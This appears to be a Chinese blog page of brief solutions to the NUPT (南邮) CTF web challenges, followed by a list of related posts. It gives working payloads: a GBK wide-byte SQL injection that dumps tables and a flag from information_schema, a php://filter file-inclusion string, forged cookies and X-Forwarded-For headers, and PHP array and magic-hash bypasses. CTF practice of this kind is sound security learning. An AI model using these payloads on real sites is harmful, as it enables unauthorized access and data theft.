mysql 南邮ctf_南邮ctf web
签到题
查看源码就可得到
md5 collision
Poc:a=240610708
签到2
关键点:输入框设定了最大的长度限制
层层递进
在iframe标签属性都为0,查看链接,一直点下去发现404.html,16行-35行,getflag
AAencode
单身二十年
源码点击./search_key.php,getflag
你从哪里来
文件包含
Poc:file=php://filter/convert.base64-encode/resource=index.php
单身一百年也没用
点击到这里找key,查看响应头,getflag
Download~!
Poc:url=ZG93bmxvYWQucGhw
COOKIE
Cookie: Login=1
MYSQL
1、查看robots.txt
2、sql.php?id=1024.00001
sql injection 3
id=2,gbk
id=1%df’ union select 1,2 –+
id=1%df’ union select database(),2 –+
回显sqli
id=1%df’ union select 1,table_name from information_schema.tables where table_schema=0x73716C6931
回显 falg
id=1%df’ union select 1,cloumn_name from information_schema.columns where table_schema=0x73716C6931
回显 fl4g
id=1%df’ union select 1,fl4g from flag –+
/x00
Poc:nctf[]=1.#biubiubiu
bypass again
Poc:a[]=1&b[]=2
变量覆盖
POST:pass=123&thepassword_123=123
PHP是世界上最好的语言
Poc:id=%2568ackerDJ
伪装者
x-forwarded-for: 127.0.0.1
上传绕过
SQL注入1
admin’)#&111
pass check
输入123,抓包改为传入数组
起名字真难
Poc:key=0xccccccccc
mysql 南邮ctf_南邮ctf web相关推荐
- mysql 南邮ctf_南邮ctf之web之wp
下面是所有现在可以做的web题的wp! 建议使用CTRL+F查找所需题目,我都有标注!这样方便! 1.签到题 直接查看源码即可 2.md5 collision 解读代码: $md51 = md5('Q ...
- mysql 南邮ctf_南邮CTF平台WEB题writeup
https://cgctf.nuptsast.com/login 1.签到题 F12查看网页源代码就有flag 2.md5 collision 附上题目给的源代码md51 = md5('QNKCDZO ...
- mysql 南邮ctf_南邮ctf web题记录(上)
1.签到题 f12看源码就行了. md5 collision 题目贴出了源码,按照题意,a不等于QNKCDZO但是md5与QNKCDZO的md5相等时就可以获得flag. 如果两个字符经MD5加密后的 ...
- 学计算机去南邮还是南信,南信大和南邮相比怎么样 南信大怎么样
南信大和南邮相比怎么样,南京邮电大学简称南邮,南京信息工程大学简称南信大,都是南京的高校,那么南信大和南邮相比怎么样呢?南信大怎么样呢? 南信大和南邮相比怎么样 南信大,坐落于南京江北新区,全称为南京 ...
- 南邮计算机考研太难,南京邮电大学的学生要考研到清华的话,有多困难?(南理工、南邮计算机考研近五年分数线复试录取比例各多少?)...
南京邮电大学考研计算机专业分数线 南邮网站上都有 复试线:信息安全300 计算机系统结构300 计算机软件与理论300 计算机应用技术295 软件工程300 计算机技术(专硕)310 软件工程(专硕) ...
- CTF Web方向考点总结
CTF Web 0X00 前言 做题已经快四个月了,接触了大大小小的题型,收藏的大师傅们的解题思路.题型总结的博客已经很多了,每次都要一个一个翻很麻烦,于是写下了这一个总结,实际上是把各大博客内容汇总 ...
- CTF——web个人总结
CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...
- ctf web必备工具_设计人员和开发人员的必备Web工具和服务
ctf web必备工具 I cannot imagine that in 2018 there are people who don't use daily several web tools and ...
- CTF Web入门 命令执行 笔记
CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...
最新文章
- 通过身份证号提取性别_身份证号提取生日、年龄、性别、籍贯,最简单的方法!...
- ordfilt2函数功能说明
- MariaDB AX开源分析解决方案
- java源码搭建教程_CentOS 7 搭建源码包搭建LNMP环境
- 南京大学计算机科学系照片,欧拉图-南京大学计算机科学与技术系.pdf
- Kubernetes中分布式存储Rook-Ceph的使用:一个ASP.NET Core MVC的案例
- 从基于Maven的Web应用程序获取版本字符串
- Nagios显示器mysql定从库: libmysqlclient.so.18: cannot open shared object file: No such
- 美团搜索-搜索引擎关键字智能提示的一种实现[转]
- 苹果电脑java如何降级,如何在Mac OSX上降级JRE / JDK?
- UI设计师分析用户的常用方法
- —— GPS测量原理及应用复习-1 ——
- 微波射频工程师必读经典参考书
- 声明一个长方形类,属性有长和宽;操作有赋值、计算长方形的周长和面积、输出信息等,要求定义构造函数(缺省值为10)和析构函数。
- C#一年级100以内的加减训练
- CSS3背景(background-size、background-origin、background-clip)圆角
- Glide加载网络图片模糊变形问题解决办法
- Python 于 webgame 的应用(上)
- 剑灵服务器人数最多,2020剑灵服务器人数排名,剑灵哪个服务器人多
- win8(四)实例讲解win8(XAML+C#)开发--------课程表:Snapped模式和动态磁贴,徽章(badge)
热门文章
- 用 .Net WebBrowser 控件获取POST数据
- 解决oracle语句中 含数字的字符串按数字排序问题
- Windows 2008 IIS7.5中创建独立账号的FTP站点图文教程
- SpringBoot图文教程9—SpringBoot 导入导出 Excel 「Apache Poi」(亲测)
- RuntimeError at /admin 解决办法(亲测)
- php xdebug安装配置与调试php技巧
- quartz定时器依赖_Grails集成Quartz插件实现定时任务(Job)
- fiddler设置中文版本_教你下载iOS老版本应用
- c语言作业做出金山打字功能,goldmountain.c
- mysql global temporary table_【转】MySQL Temporary Table相关问题的探究